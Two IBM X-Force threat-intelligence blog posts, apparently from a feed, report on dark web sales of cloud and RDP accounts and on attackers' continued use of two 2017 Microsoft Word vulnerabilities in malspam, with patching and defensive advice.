Dark Web Marketplaces Lean Heavier into Cloud Account Sales

With the rise of the cloud comes the rise of cloud accounts being sold on the Dark Web, verified by X-Force observing a 200% rise in the last year alone. Specifically, X-Force identified over 100,000 cloud account ads across Dark Web marketplaces, with some account types being more popular than others. Seventy-six percent of cloud account sales identified were Remote Desktop Protocol (RDP) access accounts, a slight uptick from the year prior. Compromised cloud credentials were also up for sale, accounting for 19% of cloud accounts advertised in the marketplaces X-Force analyzed.

The going price for this type of access is significantly low making these accounts easily attainable to the average bidder. The price for RDP access and compromised credentials average $7.98 and $11.74 respectively. Compromised credentials’ 47% higher selling price is likely due to their ease of use, as well as the fact that postings advertising credentials often include multiple sets of login data, potentially from other services that were stolen along with the cloud credentials, yielding a higher ROI for cybercriminals.

As more compromised cloud accounts pop up across these illicit marketplaces for malicious actors to exploit, it’s important that organizations work toward enforcing more stringent password policies by urging users to regularly update their passwords, as well as implement multifactor authentication (MFA). Businesses should also be leveraging Identity and Access Management tools to reduce reliance on username and password combinations and combat threat actor credential theft.

To read our comprehensive findings and learn about detailed actions organizations can take to protect their cloud environments, review our 2022 X-Force Cloud Security Threat Landscape here.

If you’re interested in signing up for the “Step Inside a Cloud Breach: Threat Intelligence and Best Practices” webinar on Wednesday, September 21, 2022, at 11:00 a.m. ET you can register here.

If you’d like to schedule a consult with IBM Security X-Force visit: www.ibm.com/security/xforce?schedulerform

The post Old Habits Die Hard: New Report Finds Businesses Still Introducing Security Risk into Cloud Environments appeared first on Security Intelligence.

What’s Old Is New, What’s New Is Old: Aged Vulnerabilities Still in Use in Attacks Today

26 February 2020 at 06:05

As reported in the IBM X-Force Threat Intelligence Index 2020, X-Force research teams operate a network of globally distributed spam honeypots, collecting and analyzing billions of unsolicited email items every year. Analysis of data from our spam traps reveals trending tactics that attackers are utilizing in malicious emails, specifically, that threat actors are continuing to target organizations through the exploitation of older Microsoft Word vulnerabilities (CVE-2017-0199 and CVE-2017-11882).

  • CVE-2017-0199 was first disclosed and patched in April 2017. It allows an attacker to download and execute a Visual Basic Script containing PowerShell commands after the victim opens a malicious document containing an embedded exploit. Unlike many other Microsoft Word and WordPad exploits, the victim does not need to enable macros or accept any prompts — the document just loads and executes a malicious file of the attacker’s choosing.
  • CVE-2017-11882 was first disclosed and patched in November 2017. This vulnerability involves a stack buffer overflow in the Microsoft Equation Editor component of Microsoft Office that allows for remote code execution. Interestingly, the vulnerable component was 17 years old (compiled in 2000) at the time of exploitation and unchanged since its removal in 2018.

These vulnerabilities, which were reported and subsequently issued patches in 2017, are the most frequently used of the top eight vulnerabilities observed in 2019. They were used in nearly 90 percent of malspam messages despite being well-publicized and dated. These findings highlight how delays in patching allow cybercriminals to continue to use old vulnerabilities and still see some success in their attacks.

2 Years and Still Going Strong

In addition to these vulnerabilities’ popularity in malspam, the volume of 2019 network attacks that targeted X-Force-monitored customers while attempting to exploit them was 25 times higher than the combined number of network attacks attempting to exploit similar vulnerabilities that leverage Object Linking and Embedding (OLE).

Our analysts did not observe a commonality regarding the malicious payloads used post-exploitation, which means that using these vulnerabilities is the choice of a wide array of threat actors and not specific to a small number of campaigns or adversarial groups.

Figure 1: Observed usage of top CVEs in 2019 spam emails (Source: IBM X-Force)

Another noteworthy insight from the figure above is that most vulnerabilities commonly used by cybercriminals are older ones. None of the vulnerabilities leveraged in 2019 were disclosed last year and only one was disclosed in 2018. The rest go back as far as 2003, further driving home the point that when it comes to malicious cyber activity, what’s old is new and what’s new is old.

The Allure of Older Vulnerabilities

Why would a wide array of threat actors use the same two old and well-known exploits in so many of their attacks? There are a few possible explanations, but the essence of it is they are cheaper, better documented, battle-tested and more likely to lead to legacy systems that are no longer being patched.

First, the exploits are very convenient for an attacker to use in that they don’t require user interaction. Unlike more recent Word vulnerabilities, which require the attacker to convince the user to enable macros, the exploits for these particular vulnerabilities automatically execute when the document is opened. This can help reduce the chance of arousing user suspicions and, accordingly, increase the rate of success.

Second, since so many different actors use these vulnerabilities, it can complicate attribution, as their widespread usage makes associating them with any particular individual or group difficult.

For example, IBM researchers recently observed threat actors leveraging these CVEs and using a variant of the X-Agent malware, which was historically associated with a threat actor known to IBM as ITG05 (also known as APT28). That threat group has been attributed to Russia’s Main Intelligence Directorate. But while they were being used by highly sophisticated threat actors, these vulnerabilities were also leveraged by low-end spammers dropping commodity malware through massive email campaigns.

The reuse of common exploits is a convenient way to muddy threat actor attribution, especially for groups that wish to remain anonymous in their operations. It can allow threat actors to hide among a large volume of activity, obfuscating their actions.

The third and perhaps most likely reason for the continued use of these vulnerabilities is the simple ease and convenience of generating documents that can exploit them. Because these types of documents are essential to the day-to-day operations of many target organizations, they are often not blocked by enterprise email filters. As a final bonus to threat actors, they are also some of the cheapest exploits cybercriminals can buy.

X-Force’s dark web research of underground forums highlights multiple offerings of free document builders that leverage each of these vulnerabilities. Our team also identified free YouTube videos focused on each vulnerability, illustrating how an attacker can generate a document to exploit these issues.

Figure 2: YouTube videos detailing how to generate documents exploiting CVEs 2017-0199, 2017-11882 (Source: IBM X-Force)

One should keep in mind that successful exploitation of older vulnerabilities is more likely to happen on older, unpatched operating systems (OSs) and legacy systems where OS end-of-life means that no new patches are even available. These kinds of systems are most likely used by organizations that can’t patch due to other issues or priorities. While there are many reasons that can contribute to the decision to defer patching, that decision is never a good one in the long run.

What Can Companies Do With This Sort of Information?

Older vulnerabilities are clearly not going away any time soon, so organizations need to be prepared to defend against their attempted exploitation. IBM X-Force Incident Response and Intelligence Services (IRIS) has the following tips for organizations to better protect themselves:

  • Asset management is an ongoing process that should be top of mind for risk management. Part of this process is continually assessing risk to critical systems and considering the consequences of not patching them. Reassess the risks and consider patching and updating operating systems as soon as possible. Reality check: Windows 7’s end-of-life took place on January 14, 2020. Is your organization ready to move to an updated OS?
  • On the application level, ensure that patches for productivity suites — especially Microsoft software — are applied as soon as they become available.
  • Monitor the organization’s environment for PowerShell callouts that may be attempting to download and execute malicious payloads.
  • Continue user education on the risks of opening attachments from unknown sources, as vulnerabilities like these do not require any user interaction beyond opening to cause harm.
  • Scope and engage in a vulnerability management program to determine if older vulnerabilities are exposing your environment to exploitation by an attacker.

Download the latest X-Force Threat Intelligence Index

The post What’s Old Is New, What’s New Is Old: Aged Vulnerabilities Still in Use in Attacks Today appeared first on Security Intelligence.

❌
❌